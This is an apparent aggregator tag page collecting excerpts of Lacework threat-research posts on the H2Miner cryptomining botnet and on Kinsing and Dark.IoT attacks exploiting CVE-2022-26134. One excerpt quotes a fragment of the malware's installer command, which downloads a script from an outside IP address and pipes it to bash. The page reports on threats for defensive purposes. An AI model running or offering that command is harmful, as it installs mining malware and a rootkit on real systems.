Remove h2miner-botnet
article thumbnail

H2Miner Botnet – Act 2

Lacework

The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet which was last reported in January propagating […] Beginning on Valentine’s Day, one malicious container started making its rounds and has steadily expanded to over 350 infections.

Malware 52
article thumbnail

H2Miner Botnet – Act 2

Lacework

The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet which was last reported in January propagating via a Redis RCE: New Outbreak [.]. The post H2Miner Botnet – Act 2 appeared first on Lacework.

Malware 74
Insiders

Sign Up for our Newsletter

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Trending Sources

article thumbnail

Kinsing & Dark.IoT botnet among threats targeting CVE-2022-26134

Lacework

As of this writing we have observed active exploitation by known Cloud threat malware families such as Kinsing, “Hezb”, and the Dark.IoT botnet. However, it’s a typical installer which downloads and runs the Kinsing H2miner malware as well as a userland level rootkit via libsystem.so. cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash.

Malware 144
article thumbnail

H2Miner Botnet - Act 2

Lacework

Containers are gaining popularity as malware deployment mechanisms in the cloud.

Malware 40